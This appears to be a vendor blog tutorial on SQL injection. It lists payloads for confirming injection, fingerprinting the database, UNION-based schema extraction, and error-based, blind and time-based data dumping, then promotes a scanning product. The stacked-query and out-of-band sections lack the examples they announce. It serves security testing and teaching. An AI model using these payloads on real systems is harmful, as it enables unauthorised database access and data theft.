What is a SQL Injection payload?
SQL Injection represents a web security vulnerability which allows attackers to view data that they should not be able to, by allowing the attacker to interfere with the queries that an application makes to its database by injecting malicious SQL injection payloads.
Learn more about SQL Injection attacks in this blog post – What Are SQL Injections and How Can They Be Prevented
In this blog post, we are going to cover how to verify if a website is vulnerable to SQLi and the different SQL injection payloads used to exploit different types of SQL injection vulnerabilities.
In this article:
Confirming SQLi: Entry point detection
To identify if your applications are vulnerable to SQLi and you can use the payloads that follow, you need to first be able to inject data into the query without breaking it. The first step is to find out how to escape from the current context.
Try one of these useful examples:
To fix the query you can input data so the previous query accepts the new data, or you can input data and add a comment symbol at the end.
This phase will be easier if you can see error messages or you can identify if /when a query is working or not.
-- comment [Note the space after the double dash]
/*! MYSQL Special SQL */
HQL does not support comments
Confirming SQLi by using logical operations
You can confirm an SQL injection vulnerability by performing a logical operation. If you get the expected result, you confirmed SQLi.
Here is how it looks in practice:
If the GET parameter
?username=John returns the same content as
‘1’=’1 then you found a SQL injection vulnerability.
This concept works for mathematical operations too:
?id=1 returns the same as
?id=2-1, you found a SQL injection vulnerability.
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
Confirming SQL injection with Timing
In some instances when trying to confirm a SQLi, there won’t be a noticeable change on the page that you are testing. This indicates a Blind SQL, which can be identified by making the database perform actions that will have an impact on the time the page needs to load.
We are going to add to the SQL query an operation that will take a longer time to execute, such as performing the following:
MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)
PostgreSQL (only support string concat)
1' || pg_sleep(10)
1' WAITFOR DELAY '0:0:10'
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
The sleep functions are not always allowed, so make a query perform complex operations that will take several seconds instead.
Identifying the Back-end
Different backends have different functions, which can be identified executing those functions. Examples of these functions are:
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
Union Based SQL Injection Payloads
Detecting number of columns
Both queries (the original one, and the one we alter) must return the same number of columns. But how do we know the number of columns the initial request is returning? We usually use one of the two following methods to get the number of columns:
GROUP BY and
ORDER BY have different functionalities in SQL, they can both be used to determine the number of columns in the query. Increment the number until you get a false response:
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
In the case of UNION SELECT, insert an increasing number of null values until the query is valid:
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
Why are null values used? There are cases in which the type of the columns on both sides of the query have to be the same. Null is valid in every case.
Extract database names, tables and column names
In the following examples, we are going to retrieve the name of all the databases, the table names from a database and the column names of the table:
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
The method used to discover this data will vary from the database itself, but it’s always the same methodology.
Error based SQL Injection Payloads
If the query output is not visible, but you can see the error messages, you can make these error messages work for you to exfiltrate the data from the database.
Similar to the Union Based exploitation example, you could dump the database:
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Blind SQL Injections Payloads
In the case of Blind SQL injection, you can’t see the results of the query nor the errors, but you can distinguish when the query returned a true or a false response based on the different content on the page.
You can abuse that behaviour to dump the database char by char:
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
Error Blind SQL Injection Payloads
As the name implies, this is very similar to Blind SQL injection, but this time you don’t have to distinguish between a true or false response. You check if there is an error in the SQL query or not, by forcing an SQL error each time you correctly guess the char:
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
Time Based SQL Injection Payloads
You can use this technique primarily when you are about to exploit blind vulnerabilities where you use a second query to trigger a DNS lookup, conditional error, or a time delay.
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
Stacked queries can be used to execute multiple queries in succession. While the subsequent queries are executed, the results are not returned to the application. You can use this technique when blind vulnerabilities where you use a second query to trigger a DNS lookup, conditional error, or a time delay.
While Oracle and MySQL don’t support stacked queries, Microsoft and PostgreSQL do support them:
Out of band SQLi Payloads
If none of the exploitation methods mentioned above worked for you, you can try to make the database exfiltrate the data to an external host controlled by you. For example, you can use DNS queries:
Detect SQL Injection with the help of Nexploit
NeuraLegion’s Nexploit automates the detection and remediation of hundreds of vulnerabilities, including SQL injection.
By integrating DAST scans early in the development process, developers and application security experts can detect vulnerabilities early, and remediate them before they appear in production.
With Nexploit the scans are done in minutes and the results come with zero false positives. This allows developers to adopt the solution and use it throughout the development lifecycle.
Scan any web app or API to prevent SQL injection vulnerabilities – try NeuraLegion Nexploit free.